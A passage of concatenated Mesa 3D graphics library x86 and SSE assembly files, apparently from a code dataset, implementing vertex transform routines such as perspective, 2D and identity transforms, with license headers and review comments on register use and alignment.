ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_2d_no_rot )
HIDDEN(_mesa_x86_transform_points4_2d_no_rot)
GLNAME( _mesa_x86_transform_points4_2d_no_rot ):
#define FRAME_OFFSET 16
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
PUSH_L( EBP )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_2dnrr_done) )
/* set up the dest vector header and compute the loop end pointer */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p4_2dnrr_loop):
/* x' = x*m0 + w*m12,  y' = y*m5 + w*m13 */
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F5 F4 */
FMUL_S( MAT5 )
FLD_S( SRC3 ) /* F0 F5 F4 */
FMUL_S( MAT12 )
FLD_S( SRC3 ) /* F1 F0 F5 F4 */
FMUL_S( MAT13 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
/* pass source z and w straight through as integers */
MOV_L( SRC2, EBX )
MOV_L( SRC3, EBP )
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
MOV_L( EBP, DST3 )
LLBL(x86_p4_2dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_2dnrr_loop) )
LLBL(x86_p4_2dnrr_done):
POP_L( EBP )
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_x86_transform_points4_identity
 * Identity "transform": a strided 16-byte-per-vertex copy from the
 * source vector to the dest vector using four 32-bit integer moves.
 * Skips the copy entirely when source and dest start pointers are
 * equal.  NOTE(review): the matrix pointer is loaded into EDX but the
 * identity copy never reads the matrix; EDX is reused as a scratch
 * register inside the loop.
 * Regs: ESI = src ptr, EDI = dst ptr, EAX = src stride,
 *       ECX = end-of-dest sentinel, EBX/EDX = copy scratch.
 */
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_identity )
HIDDEN(_mesa_x86_transform_points4_identity)
GLNAME( _mesa_x86_transform_points4_identity ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_ir_done) )
/* set up the dest vector header and compute the loop end pointer */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
/* nothing to do if copying in place */
CMP_L( ESI, EDI )
JE( LLBL(x86_p4_ir_done) )
ALIGNTEXT16
LLBL(x86_p4_ir_loop):
MOV_L( SRC0, EBX )
MOV_L( SRC1, EDX )
MOV_L( EBX, DST0 )
MOV_L( EDX, DST1 )
MOV_L( SRC2, EBX )
MOV_L( SRC3, EDX )
MOV_L( EBX, DST2 )
MOV_L( EDX, DST3 )
LLBL(x86_p4_ir_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p4_ir_loop) )
LLBL(x86_p4_ir_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 15,767
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform3.S
|
/* $Id: sse_xform3.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/** TODO:
* - insert PREFETCH instructions to avoid cache-misses !
* - some more optimizations are possible...
* - for 40-50% more performance in the SSE-functions, the
* data (trans-matrix, src_vert, dst_vert) needs to be 16byte aligned !
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define S(i) REGOFF(i * 4, ESI)
#define D(i) REGOFF(i * 4, EDI)
#define M(i) REGOFF(i * 4, EDX)
/*
 * _mesa_sse_transform_points3_general
 * SSE transform of 3-component points by a full 4x4 matrix (w treated
 * as 1): dest = x*row0 + y*row1 + z*row2 + row3, stored as 4 floats.
 * The four matrix rows are preloaded into XMM0-XMM3 outside the loop.
 * NOTE(review): MOVAPS on the matrix rows and on the dest requires
 * 16-byte alignment of both (see the alignment TODO in the file
 * header) -- confirm callers guarantee this.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM4-XMM6 are per-vertex scratch.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_general)
HIDDEN(_mesa_sse_transform_points3_general)
GLNAME( _mesa_sse_transform_points3_general ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
CMP_L ( CONST(0), ECX ) /* count == 0 ? */
JE ( LLBL(K_GTPGR_finish) ) /* yes -> nothing to do. */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
/* hoist the four matrix rows out of the loop */
MOVAPS ( REGOFF(0, EDX), XMM0 ) /* m0 | m1 | m2 | m3 */
MOVAPS ( REGOFF(16, EDX), XMM1 ) /* m4 | m5 | m6 | m7 */
MOVAPS ( REGOFF(32, EDX), XMM2 ) /* m8 | m9 | m10 | m11 */
MOVAPS ( REGOFF(48, EDX), XMM3 ) /* m12 | m13 | m14 | m15 */
ALIGNTEXT32
LLBL(K_GTPGR_top):
/* broadcast each source component, multiply by its row, sum rows */
MOVSS ( REGOFF(0, ESI), XMM4 ) /* | | | ox */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* ox | ox | ox | ox */
MOVSS ( REGOFF(4, ESI), XMM5 ) /* | | | oy */
SHUFPS ( CONST(0x0), XMM5, XMM5 ) /* oy | oy | oy | oy */
MOVSS ( REGOFF(8, ESI), XMM6 ) /* | | | oz */
SHUFPS ( CONST(0x0), XMM6, XMM6 ) /* oz | oz | oz | oz */
MULPS ( XMM0, XMM4 ) /* m3*ox | m2*ox | m1*ox | m0*ox */
MULPS ( XMM1, XMM5 ) /* m7*oy | m6*oy | m5*oy | m4*oy */
MULPS ( XMM2, XMM6 ) /* m11*oz | m10*oz | m9*oz | m8*oz */
ADDPS ( XMM5, XMM4 )
ADDPS ( XMM6, XMM4 )
ADDPS ( XMM3, XMM4 )
MOVAPS ( XMM4, REGOFF(0, EDI) )
LLBL(K_GTPGR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTPGR_top) )
LLBL(K_GTPGR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points3_identity
 * Identity "transform" for 3-component points: copies x,y with one
 * MOVLPS and z with one MOVSS per vertex.  Dest size/flags are set
 * to 3 / VEC_SIZE_3.  Skips the copy when source == dest.
 * Regs: ESI = src ptr, EDI = dst ptr, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM0 is copy scratch.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_identity)
HIDDEN(_mesa_sse_transform_points3_identity)
GLNAME( _mesa_sse_transform_points3_identity ):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTPIR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
/* in-place copy would be a no-op */
CMP_L( ESI, EDI )
JE( LLBL(K_GTPIR_finish) )
ALIGNTEXT32
LLBL(K_GTPIR_top):
MOVLPS ( S(0), XMM0 )
MOVLPS ( XMM0, D(0) )
MOVSS ( S(2), XMM0 )
MOVSS ( XMM0, D(2) )
LLBL(K_GTPIR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTPIR_top) )
LLBL(K_GTPIR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points3_3d_no_rot
 * SSE transform of 3-component points by a scale+translate matrix:
 * x' = x*m0 + m12, y' = y*m5 + m13 (packed pair), z' = z*m10 + m14
 * (scalar).  Matrix constants are preloaded into XMM1-XMM4.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM0 is per-vertex scratch.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_3d_no_rot)
HIDDEN(_mesa_sse_transform_points3_3d_no_rot)
GLNAME(_mesa_sse_transform_points3_3d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
/* hoist matrix constants: XMM1 = (m5|m0), XMM2 = (m13|m12),
 * XMM3 = m10, XMM4 = m14 */
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* - | - | m13 | m12 */
MOVSS ( M(10), XMM3 ) /* - | - | - | m10 */
MOVSS ( M(14), XMM4 ) /* - | - | - | m14 */
ALIGNTEXT32
LLBL(K_GTP3DNRR_top):
MOVLPS ( S(0), XMM0 ) /* - | - | s1 | s0 */
MULPS ( XMM1, XMM0 ) /* - | - | s1*m5 | s0*m0 */
ADDPS ( XMM2, XMM0 ) /* - | - | +m13 | +m12 */
MOVLPS ( XMM0, D(0) ) /* -> D(1) | -> D(0) */
MOVSS ( S(2), XMM0 ) /* sz */
MULSS ( XMM3, XMM0 ) /* sz*m10 */
ADDSS ( XMM4, XMM0 ) /* +m14 */
MOVSS ( XMM0, D(2) ) /* -> D(2) */
LLBL(K_GTP3DNRR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP3DNRR_top) )
LLBL(K_GTP3DNRR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points3_perspective
 * SSE transform of 3-component points by a perspective-shaped matrix:
 * x' = x*m0 + z*m8, y' = y*m5 + z*m9 (packed pair),
 * z' = z*m10 + m14, w' = -z (computed as 0 - z using XMM6 = 0).
 * Dest is written as 4 floats (size 4 / VEC_SIZE_4).
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM0/XMM5 are per-vertex scratch.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_perspective)
HIDDEN(_mesa_sse_transform_points3_perspective)
GLNAME(_mesa_sse_transform_points3_perspective):
#define FRAME_OFFSET 8
PUSH_L ( ESI )
PUSH_L ( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3PR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(4), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
/* hoist matrix constants: XMM1 = (m5|m0), XMM2 = (m9|m8),
 * XMM3 = m10, XMM4 = m14, XMM6 = 0.0 (for negation) */
MOVSS ( M(0), XMM1 ) /* - | - | - | m0 */
MOVSS ( M(5), XMM2 ) /* - | - | - | m5 */
UNPCKLPS ( XMM2, XMM1 ) /* - | - | m5 | m0 */
MOVLPS ( M(8), XMM2 ) /* - | - | m9 | m8 */
MOVSS ( M(10), XMM3 ) /* m10 */
MOVSS ( M(14), XMM4 ) /* m14 */
XORPS ( XMM6, XMM6 ) /* 0 */
ALIGNTEXT32
LLBL(K_GTP3PR_top):
MOVLPS ( S(0), XMM0 ) /* oy | ox */
MULPS ( XMM1, XMM0 ) /* oy*m5 | ox*m0 */
MOVSS ( S(2), XMM5 ) /* oz */
SHUFPS ( CONST(0x0), XMM5, XMM5 ) /* oz | oz */
MULPS ( XMM2, XMM5 ) /* oz*m9 | oz*m8 */
ADDPS ( XMM5, XMM0 ) /* +oy*m5 | +ox*m0 */
MOVLPS ( XMM0, D(0) ) /* ->D(1) | ->D(0) */
MOVSS ( S(2), XMM0 ) /* oz */
MULSS ( XMM3, XMM0 ) /* oz*m10 */
ADDSS ( XMM4, XMM0 ) /* +m14 */
MOVSS ( XMM0, D(2) ) /* ->D(2) */
/* dest w = 0 - oz */
MOVSS ( S(2), XMM0 ) /* oz */
MOVSS ( XMM6, XMM5 ) /* 0 */
SUBPS ( XMM0, XMM5 ) /* -oz */
MOVSS ( XMM5, D(3) ) /* ->D(3) */
LLBL(K_GTP3PR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP3PR_top) )
LLBL(K_GTP3PR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points3_2d
 * SSE transform of 3-component points by a 2D matrix: the x/y pair is
 * computed as x*(m1|m0) + y*(m5|m4) + (m13|m12); z is copied through
 * unchanged.  Matrix column pairs are preloaded into XMM0-XMM2.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM3/XMM4 are per-vertex scratch.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_2d)
HIDDEN(_mesa_sse_transform_points3_2d)
GLNAME(_mesa_sse_transform_points3_2d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3P2DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
/* hoist matrix pairs out of the loop */
MOVLPS( M(0), XMM0 ) /* m1 | m0 */
MOVLPS( M(4), XMM1 ) /* m5 | m4 */
MOVLPS( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP3P2DR_top):
MOVSS ( S(0), XMM3 ) /* ox */
SHUFPS ( CONST(0x0), XMM3, XMM3 ) /* ox | ox */
MULPS ( XMM0, XMM3 ) /* ox*m1 | ox*m0 */
MOVSS ( S(1), XMM4 ) /* oy */
SHUFPS ( CONST(0x0), XMM4, XMM4 ) /* oy | oy */
MULPS ( XMM1, XMM4 ) /* oy*m5 | oy*m4 */
ADDPS ( XMM4, XMM3 )
ADDPS ( XMM2, XMM3 )
MOVLPS ( XMM3, D(0) )
/* z passes through unchanged */
MOVSS ( S(2), XMM3 )
MOVSS ( XMM3, D(2) )
LLBL(K_GTP3P2DR_skip):
ADD_L ( CONST(16), EDI )
ADD_L ( EAX, ESI )
CMP_L ( ECX, EDI )
JNE ( LLBL(K_GTP3P2DR_top) )
LLBL(K_GTP3P2DR_finish):
POP_L ( EDI )
POP_L ( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points3_2d_no_rot
 * SSE transform of 3-component points by a 2D scale+translate matrix:
 * the x/y pair is computed as (x,y)*(m5|m0) + (m13|m12); z is copied
 * through unchanged.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM0 is per-vertex scratch.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_2d_no_rot)
HIDDEN(_mesa_sse_transform_points3_2d_no_rot)
GLNAME(_mesa_sse_transform_points3_2d_no_rot):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3P2DNRR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
/* hoist matrix constants: XMM1 = (m5|m0), XMM2 = (m13|m12) */
MOVSS ( M(0), XMM1 ) /* m0 */
MOVSS ( M(5), XMM2 ) /* m5 */
UNPCKLPS ( XMM2, XMM1 ) /* m5 | m0 */
MOVLPS ( M(12), XMM2 ) /* m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP3P2DNRR_top):
MOVLPS( S(0), XMM0 ) /* oy | ox */
MULPS( XMM1, XMM0 ) /* oy*m5 | ox*m0 */
ADDPS( XMM2, XMM0 ) /* +m13 | +m12 */
MOVLPS( XMM0, D(0) ) /* ->D(1) | ->D(0) */
/* z passes through unchanged */
MOVSS( S(2), XMM0 )
MOVSS( XMM0, D(2) )
LLBL(K_GTP3P2DNRR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP3P2DNRR_top) )
LLBL(K_GTP3P2DNRR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
/*
 * _mesa_sse_transform_points3_3d
 * SSE transform of 3-component points by a 3D (affine) matrix:
 * dest = x*row0 + y*row1 + z*row2 + row3, with only x/y/z stored
 * (MOVLPS for the low pair, UNPCKHPS+MOVSS for z).
 * NOTE(review): MOVAPS loads of the matrix rows require the matrix to
 * be 16-byte aligned -- see the alignment TODO in the file header.
 * Regs: ESI = src ptr, EDI = dst ptr, EDX = matrix, EAX = src stride,
 *       ECX = end-of-dest sentinel; XMM4-XMM6 are per-vertex scratch.
 */
ALIGNTEXT4
GLOBL GLNAME(_mesa_sse_transform_points3_3d)
HIDDEN(_mesa_sse_transform_points3_3d)
GLNAME(_mesa_sse_transform_points3_3d):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( REGOFF(OFFSET_SOURCE+8, ESP), ESI ) /* ptr to source GLvector4f */
MOV_L( REGOFF(OFFSET_DEST+8, ESP), EDI ) /* ptr to dest GLvector4f */
MOV_L( ARG_MATRIX, EDX ) /* ptr to matrix */
MOV_L( REGOFF(V4F_COUNT, ESI), ECX ) /* source count */
TEST_L( ECX, ECX)
JZ( LLBL(K_GTP3P3DR_finish) ) /* count was zero; go to finish */
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX ) /* stride */
OR_L( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, EDI) ) /* set dest flags */
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) ) /* set dest count */
MOV_L( CONST(3), REGOFF(V4F_SIZE, EDI) ) /* set dest size */
SHL_L( CONST(4), ECX ) /* count *= 16 */
MOV_L( REGOFF(V4F_START, ESI), ESI ) /* ptr to first source vertex */
MOV_L( REGOFF(V4F_START, EDI), EDI ) /* ptr to first dest vertex */
ADD_L( EDI, ECX ) /* count += dest ptr */
ALIGNTEXT32
/* hoist the four matrix rows out of the loop */
MOVAPS( M(0), XMM0 ) /* m2 | m1 | m0 */
MOVAPS( M(4), XMM1 ) /* m6 | m5 | m4 */
MOVAPS( M(8), XMM2 ) /* m10 | m9 | m8 */
MOVAPS( M(12), XMM3 ) /* m14 | m13 | m12 */
ALIGNTEXT32
LLBL(K_GTP3P3DR_top):
MOVSS( S(0), XMM4 )
SHUFPS( CONST(0x0), XMM4, XMM4 ) /* ox | ox | ox */
MULPS( XMM0, XMM4 ) /* ox*m2 | ox*m1 | ox*m0 */
MOVSS( S(1), XMM5 )
SHUFPS( CONST(0x0), XMM5, XMM5 ) /* oy | oy | oy */
MULPS( XMM1, XMM5 ) /* oy*m6 | oy*m5 | oy*m4 */
MOVSS( S(2), XMM6 )
SHUFPS( CONST(0x0), XMM6, XMM6 ) /* oz | oz | oz */
MULPS( XMM2, XMM6 ) /* oz*m10 | oz*m9 | oz*m8 */
ADDPS( XMM5, XMM4 ) /* + | + | + */
ADDPS( XMM6, XMM4 ) /* + | + | + */
ADDPS( XMM3, XMM4 ) /* + | + | + */
/* store x,y from the low qword, then move z down and store it */
MOVLPS( XMM4, D(0) ) /* => D(1) | => D(0) */
UNPCKHPS( XMM4, XMM4 )
MOVSS( XMM4, D(2) )
LLBL(K_GTP3P3DR_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(K_GTP3P3DR_top) )
LLBL(K_GTP3P3DR_finish):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 7,051
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/sse_xform4.S
|
/* $Id: sse_xform4.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_SSE_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 8
#define SRC(i) REGOFF(i * 4, ESI)
#define DST(i) REGOFF(i * 4, EDI)
#define MAT(i) REGOFF(i * 4, EDX)
#define SELECT(r0, r1, r2, r3) CONST( r0 * 64 + r1 * 16 + r2 * 4 + r3 )
/*
 * _mesa_sse_transform_points4_general
 * SSE transform of 4-component points by a full 4x4 matrix:
